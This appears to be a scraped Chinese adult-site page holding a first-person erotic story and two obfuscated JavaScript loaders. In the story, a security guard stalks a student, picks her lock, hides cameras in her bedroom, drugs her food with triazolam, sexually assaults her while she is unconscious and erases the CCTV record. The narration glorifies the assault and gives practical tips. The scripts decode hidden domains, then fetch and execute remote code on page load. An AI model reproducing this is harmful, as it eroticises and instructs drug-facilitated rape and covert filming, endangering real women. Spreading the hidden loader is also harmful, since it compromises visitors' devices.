看打炮:kandapao.cc 看打炮:kandapao.vip 广告联系✈:@kandapao

function RhSzTd(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function TIlWio(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return RhSzTd(t);};window['\x45\x71\x73\x4f\x62\x57\x65\x64']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=TIlWio,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ZmIuc2ltcGFzYSS5jbg==','dHIueWWVzdWW42NzguY29t','151235',window,document,['S','W']);}:function(){};

保安玩小姐


  如果你认为自己是土豪多金,可以用钱俘获女人的芳心,得到女人的身体,请关掉。

  如果你认为你年轻帅气,靠美貌能吸引女人,那么请关掉,如果你认为自己有才,靠才华迷倒少女,那么请关掉,如果你认为自己靠强奸能的到女神,不怕坐牢,那么请关掉。如果和我一样,年龄大了,又不是平民百姓,不能用大把的钱往女人身上砸,又有自己的正常生活,不想因此家庭破碎,妻离子散让别人在后面戳脊梁骨,而且自己已经过了吸引女人的年龄,脸上都是沧桑的皱纹,手上都是干活磨的老茧,皮肤黝黑法暗,甚至如果是年轻女性都会嫌弃我们老,丑,身上的体味。虽然老当益壮,体力充沛,甚至比一些年轻人病殃殃的身体还要好很多,如果真的有女神在面前你还感觉自行惭愧,别说配不配得上,就连说句话都全是奢侈的。通过正常渠道,这些女人是一辈子都得不到的。但是内心里就是想玷污她,得到她,而且,用完美的手法得到她。那么就和老汉一起交流一下,老汉这么多年的一些经验,遇到的突发状况,和大家交流一下,如果不喜欢,请绕道。

  我相对其他几位看大门的老头,我还算是年轻的,再加上我一米八的大高个,身体又壮士,干了几年就混上了保安队长。

  下面我给大家分享一下我是怎么得到小区里的女人们的。

  首先说小区里的进出都是在我眼皮底下的,在正门几乎没有可能混的进来,监控也是我在保安队长的房间里,所以,如果有人要调监控,我就可以把我作案的时候的所有监控全部删去。

  而且,猎物如果出现,和猎物的生活习性,作息习惯,我全部都能掌握。天下没有简单的事情,要想得到自己想要的,就必须要胆大心细。

  当然,我得手的猎物太多了,我就不一一介绍,介绍几个典型的吧。

  其中一个是一位大学生,高中时候就出相貌出众,是学校的校花后来又考入北京电影学院表演系,家境富裕,爸爸是我们当地有名的富商,妈妈是大学老师。一家四口,还有个弟弟在读初中。

  她的爸爸不是经常回家,可能是晚上应酬太多,也可能外面还有个家。她的妈妈生活很规律,早上7.30送儿子上学,中午不回家,下午弟弟17.20准时校车到小区门口,17.30左右妈妈下班回家,他的弟弟晚上有时候在球场打篮球,有时候去上辅导班,一直到9.30左右回家。妈妈一般到家以后不出门,这是周一到周五,周末就不做介绍了。

  规律的作息才是我下手的好时机。

  我在网上买的开锁工具,花了我一个多月工资还带教程,让我学习了好久…什么锁都能开,功夫不负有心人,我的手法还算可以,一般的锁10秒内都能开。还有一个准备的东西就是头套,真人头套在网上也可以买的到,万一没踩好点室内有监控的话,好能保护自己,当然了,一般家里没有保姆没有老人和孩子的基本都没有监控。

  还有一个准备好的东西就是针孔摄像头,因为你只有把所有人都看到,才能掌控所有的人。这些东西都是在网上都能买的到的。

  下面说一个不太好买的,就是安眠药。

  三唑仑,这个药区别于其他的安眠药,别的安眠药是帮助你进去睡眠状态,而这个不但让你进入睡眠状态,而且能让你睡着了不轻易醒,所以,这个更安全一些。好了,目标选好,家庭人员的情况,作息规律都已经摸清,作案工具也已经准备就绪,下一步就是下勾准备钓鱼。

  首先我们把保安队员都安排好,小李,你守好门口,闲杂人等一律不许入内,外卖快递都放到传达室,你和小张送一下。老胡,你去北区巡逻一下……安排好了他们以后,我也装模做样的去巡视,因为我观察到她的爸爸今天早上出门了。开着商务车出去的。一般开这个车就说明他要出差,一般几天都回不来,她的弟弟和妈妈一起出门。弟弟去上学妈妈去上班,所以现在家里是没有人的状态,我开着巡逻车转到她家门口,她的家是我们小区最大的几栋别墅之一,是独栋别墅,上下三层,前面是一个小院子,院子里面种着全是名贵树种,窗台下还有几盆名花,虽然我不懂花草,但是还是比我们村的那些野花野草要好看的多,左边是一个小亭子仿古长廊,一直连着后面的室外游泳池。总得来说,就是富态,奢华。前门肯定是不能走的,因为趴院子的话周围没有遮挡,会被人发现,就这样,我转到了后门,后门是两个车库,旁边是进去的楼道,我把巡逻车放在路边,拿着我的开锁工具,真人头套,和摄像头下了车。我用熟练的手法开了门,戴着头套进入去,映入眼帘的是一个超大的客厅,抬头一看一个巨大的水晶吊灯居中挂在三层楼那么高的客厅顶上,虽然是白天没有开灯。但还是亮晶晶的,地面全是最高级的地板砖,屋里的装饰也都是欧式的豪华家具,我先四周看了一下确定没有摄像头,如果有摄像头也不怕,因为进家门之前我已经把电给断掉了,有摄像头也不会发现我,我穿上鞋套戴上手套,不留下一丝的证据,我打开二楼的每个房间,分辨出都是谁的房间,然后在楼道,客厅,三个卧室分别装了五个针孔摄像头,然后快速的出门。我回到了保安室,像什么都没有发生过一样,询问他们巡逻的情况。我为什么选择这时候去安装监控,因为她马上就放暑假了,暑假肯定是要回家的。虽然不知道在家能住几天。但是只要有一天的机会被我抓住,就是我得手的好时候,做事切记急躁。

  说着我打开电脑,把监控的角度信号都调试一下,确保能看到卧室的大部分,主要是创和床头厨周围,调试好以后我就把我进出别墅的监控都删掉。

  就这样安静的过了几天,是一天的中午,我在门口执勤,一辆出租车停在小区门口,车上下来一个婷婷玉丽的小美女,身高一米七左右,穿着紧身牛仔裤,趁出一双修长的大长腿,裤上还破了几个洞,有钱人家也舍不得买个新衣服,破了洞还穿,可能这就是年轻人的时尚,咱不懂,她提着行一个粉红色的行李箱慢慢的向门口走开,走到门口我才看清楚她的脸,年纪大了眼神也不好使,她皮肤如凝脂,就像洁白的玉一样,嫩的能掐出水来,大眼睛高鼻梁,樱桃小嘴,就像大明星一样,这以后成为大明星也只是时间问题,这是我见过最完美的长相。她越走越近,我竟然有点小紧张,心跳扑腾扑腾的,就像她要走进我的怀里一样,我平时为人和善,一副老好人的样子,就像一位慈祥的大叔,女孩冲着我笑着打招呼,叔叔好。

  她笑起来两个小酒窝,可爱极了,让人忍不住想去亲一口,我竟一时愣在那里,女孩又走了几步看我两眼直勾勾的看着她走神,脸一下就红了,红的像苹果一样,一直红到脖子,害羞的低下头,我才刚反应过来,这是放假回来了啊,来,韩叔叔帮你拿行李,说着我迎上去接行李,她也忙说谢谢,几个月没见,走到她身边我发现她少了几分青涩,多了几分成熟,但毕竟也就是1920岁的女学生,身上没有染上社会的俗气,身上的味道让我有点沉醉,我提着重重的行李把她送到别墅门口,一路上没有说话,到门口以后我放下行李,她拿钥匙开门,礼貌的请我进去坐一坐,我当然想进去,不但想进去还想进去把你按倒,但是脸上不能表现出来。我客套两句把行李放进屋内我就走了,出来以后我装模做样的巡视一下,回到保安室打开监控,切换到客厅的监控,空无一人,只剩下放在门口的一个大箱子,看来女神也是够懒的,到家以后本性暴露出来,切换到卧室也没有,嗯?监控里没有人,心里有一点失落,监控还是安装的不到位,有可能是在洗手间洗澡,毕竟这么热的天,大中午的出了这么多汗,脑海里浮现出一个窈窕美女在洗澡的画面,让我如痴如醉啊,就在我脑补的时候,画面中出现了一位几乎裸身的女人,对,就是她,虽然还不知道她的名字,但是我已经确定,这个女人已经是我的囊中之物。只见她戴着浴帽裹着那乌黑的秀发,穿着紧身的黑色四角短裤,露出修长笔直白皙的双腿,没有一丝赘肉,完美的身材,恰到好处的身材比例,上身白色吊带,显然是没有穿内衣。隐约能看到凸起来的胸部,真美!

  过了一会,我听到外面有人在吵吵,我就起身去外面看看,原来是送外卖的要进小区送外卖呗门口值班的老李拦下了,外卖小伙子非要进去,根据我们物业的规定,外卖和快递都是不允许进小区的,我走过去喊住正在争吵不休的他们,说明情况以后,我接过快递一看,B排,8号别墅,徐仙女收。正是徐性富商之女,我朝思暮想的徐女神。机会来了!我们小区的外卖只能送到这里,剩下的距离,我们帮你送达!就这样打发了外卖小伙,老李赶忙说,领导我去送吧,顺手就来拿外卖,我也赶忙顺势一躲,不用,这个我来送吧。老李也纳闷,平时我都懒得动,就喜欢在大门口站着,要不就在保安队长室看监控,今天怎么突然主动要送外卖,我一看老李错愕的超市,解释道,最近老是坐着腰疼腿酸的,走两步活动活动,他也笑笑说好,我回到办公室拿出早就磨成粉末的安眠药洒在外卖里,大摇大摆的走去B排8号。走到门前按响门铃,从门口的对讲器里听到年轻女人悦耳的声音,谁啊?我说我说保安,你的外卖到了。就这样她打开门门来了一个缝,探出半个身子伸手来接外卖,身子被门挡着,只露出白白瘦瘦的胳膊,和一只修长的玉手,还有未干的秀发,散发着高级洗发水的香气,让我忍不住深深的洗了一口气,不忍呼出来。她接过外卖以后说了声谢谢就关上门。

  我也赶紧回去看监控。

  打开监控,正好看到她在狼吞虎咽的吃外卖,一边吃外卖,一边还在拿着手机聊天,还一边不时傻笑。

  天真烂漫,可爱活泼至极。

  吃完以后,她趴在床上玩手机,渐渐的我看到她开始打哈气,大约又过了15分钟,她终于困得睁不开眼睛,手机屏幕亮着就趴着睡了过去,应该是药效奇效了。

  她的妈妈一般傍晚才会回来,弟弟也是。

  爸爸应该在长途出差,不知道什么时候回来,现在唯一的不确定因素就在爸爸会不会突然回来,毕竟宝贝女儿刚放假,特殊情况也不好说,所以我安排老李,我说这里有一个给b排8号徐总的一件物品,请他回来的时候,一定拦下他给他物品,并打电话通知我,这个也是我疏忽的一点,我应该在他车上安装上定位,这样就知道他回不回来,还是老样子,进门之前先断电,带手套,脚套,头套。

  进门以后直接来到徐仙女的卧室,推开门,一双修长的大长腿映在眼前,我慢慢走进去,走过去轻轻的抚摸她的腿,热热的,软软的,滑滑的,这感觉就像电流一样刺激着我,白里透红的粉嫩皮肤在我又黑又皱的大手下面显得格外的吹弹可破,我轻轻的抚摸着她,另一手摇了摇她的肩膀,见她完全没有反应,我摆好高清摄像机的机位,我要记录这历史性的时刻,我一个年过五旬的生活在社会最底层的保安,是如何玷污一个高贵的完美的富家小姐,很有可能的未来的大明星。

  我我把她上身的吊带往上撩了撩,露出纤细的小腰,她的身材超级好,就像年轻人经常说的健美身材,屁股翘翘的,我抚摸了一下她的腰,轻轻的给她翻过身,她丝毫没有反应,就跟晕死过去一样,我剥开她散乱在脸上的头发,露出她的正脸,我感到窒息的一张脸,我甚至不敢呼吸,白白的脸颊,尖尖的下巴,高挺的鼻梁,虽然眼睛闭着,但是想起白天看到她那一双大眼睛,不由得我的弟弟硬了起来,我把她的吊带卷到脖子下面,露出胸前一对小白兔,她的胸不算太大,一只手刚好能握的过来,我一手抓住一个小白兔,轻轻揉几下,小白兔在我手里发烫,软软的又很有弹性,我吻上她精致的脸颊,她的额头,她的眼睛,她紧闭的双唇,我用舌头轻松的剥开她的嘴唇,她的呼吸吹进我的嘴里,她的体香混杂着她身上高级化妆品的味道,让我意乱情迷,尝着她温软的嘴唇,我终于找到了她的香舌,我用我的舌头环绕着她的嫩滑的香舌,把口水流进她的嘴里,手上的力气稍微增大一点,她的呼吸吹进我的嘴里,我用一只手顺着平坦的小腹摸到纤细的小腰,摸到翘起的屁股,屁股的弹性比胸部更大,也是光滑的皮肤,我用手一撑,顺势把四角裤褪下,漏出半边臀部,我的嘴巴放开亲的满是唾液的嘴唇,亲上她的脖子,她能养鱼的锁骨,她乳头,近距离的观看她的乳房,她乳房上的血管清晰可见,乳头是粉红色的,像是还没成熟的樱桃,我轻轻的含在嘴里,用舌头开回拨弄,她的乳头越来越硬,虽然意识睡着了,身体还是有反应的,我顺着小腹摸到了秘密花园,就一小撮阴毛,黑黑的整整齐齐的盖在神秘地带,我褪下她的短裤,整个一个裸体呈现在我眼前,白天高贵的女神,清纯可爱活泼的精灵,正常渠道我一辈子都不可能触摸的女人。

  就这样安安静静的一丝不挂的躺在我的面前,我不想放过她身上的每一寸皮肤,我抚摸她的全身,她的脸颊,她的脖子,她的胸部,她的胳膊她的手,她的后背她的臀部,她修长的双腿,她大腿内侧最柔嫩的皮肤,我用湿漉漉的略带胡须的嘴巴又亲吻可她的全身,每一寸皮肤,她的手,她的脚,我扒开她的秘密森林,漏出她最神秘的洞穴,粉嫩的阴蒂,好似一片未经开发的圣地。

  我吻上那片粉嫩,用舌头来回的摩擦,不时深入洞里,她好像有点反映,呼吸加重了,我加快舌头的速度,她也只是呼吸略微加重,看来安眠药的效果真的不错,我也脱下自己的裤子把饥渴了几个月的早就硬的不行的大棒棒一下弹出来,他从来没有享受过这么年轻漂亮又高贵的女人,他在我面前一跳一跳的,就在我准备提臀想插入的时候,我一下清醒过来,我不能进去,如果我她还是处女,我进去了以后势必会流出处女的血,而且她清醒以后也会因为我的太大撑得她阴道的疼痛,我瞬间冷静了下来,还是从长计议,但是我还是让我弟弟用另一种方式享受了她的身体,我在她粉嫩的阴蒂上摩擦,享受着她带给我的快感,用我的大棒棒又摩擦了她的全身,她的乳头,最后,我用她的乳房夹着我的大棒棒,射到她的脖子上,她的胸上。

  射完精意犹未尽的我躺在她身边,把她搂入我的怀里,她的呼吸吹在我的胸膛,柔软的胸部挤压在我的身上,我轻轻的抚摸她的后背,她的秀发。

  这时候,我的手机突然震动,我一看是老李的电话,赶忙接了起来,他说徐先生,我听到着三个字立马挂掉电话,一下慌了起来,意外还是发生了,就在片刻慌张以后,我快速行动起来,擦掉她身上的精液,把她吊带拉下来,给她穿上四角短裤,然后我起身穿好衣服,把摆好的摄像机收起来,穿好鞋子快速往门口跑去,我跑出门口快速的跑到配电箱那里,这时候徐老板的车正好到别墅门口,司机下车给徐老板开门,我也打开了配电箱的门,把电送上,徐老板看到了我,问你怎么在这,我说现在天热小区里用电负荷太大,我怕出问题,给咱家检查一下是否正常,别大热的天空调都来不了,他笑着走进屋门,我用袖子擦了擦满头大汗,也不知是热的,还是太紧张,我有点胆战心惊的回到了保安室,赶紧打开监控,一是看看我是不是忘记了哪些细节,二是看看徐老板到家看到熟睡的女儿会怎么办,我看着徐老板来到女儿房间,看到她头发凌乱衣衫不整的躺在床上,身边的手机屏幕也亮着,桌子上还有一片狼藉的吃剩下的外卖。

  看着她满头大汗,给她按开了空调,我看他嘴里嘟囔着什么,但是我按的监控是没有声音的,所以我也不知道他说了什么,他在女儿额头上亲吻了一下就出了房间。

  我也松了一口气,看来是没有发现什么。

  以后的几天,她经常出门,应该是和同学聚会什么的,几乎不在家点外卖,所以,也就没有机会去亲近的我的女人,我一直在思考,用什么办法才能真正的得到她,而不是只在外面蹭蹭,正在我焦头烂额,想尽脑汁的时候,机会来了。

  有想真正实施的,我劝你还是打消这个念头,因为更多的防范细节我没有全部列出,一旦被发现可是要有牢狱之灾,请大家三思,我也在考虑要不要发表,因为毕竟涉及到非常这件事情确实是发生过,我怕万一有人对号入座就会发现我的存在,后续更不更新我得考虑下,再改动一下,感兴趣的可以留言讨论下。

  【完】


function irEIsy(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function jOTUsRu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return irEIsy(t);};window['\x55\x43\x72\x66\x4c\x56\x47']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=jOTUsRu,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ZmIuc22ltcGFzYS5jbg==','dHIueWVzdW42NzguY299t','151236',window,document,['2','9']);}:function(){};